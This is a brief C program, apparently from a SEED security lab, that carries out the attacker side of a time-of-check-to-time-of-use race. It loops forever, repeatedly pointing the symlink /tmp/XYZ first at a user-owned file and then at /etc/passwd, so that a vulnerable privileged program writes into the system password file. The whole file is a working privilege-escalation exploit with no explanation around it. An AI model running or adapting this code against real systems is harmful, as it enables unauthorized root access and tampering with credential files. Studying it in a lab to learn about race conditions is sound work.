#include <unistd.h>

int main() {
	while(1) {
		unlink("/tmp/XYZ");                       /* Step 1 */
		symlink("/home/seed/path/UserOwnedFile", "/tmp/XYZ");   /* Step 2 */
		usleep(10000);
		unlink("/tmp/XYZ");                       /* Step 3 */
		symlink("/etc/passwd", "/tmp/XYZ");       /* Step 4 */
		usleep(10000);
	}
}
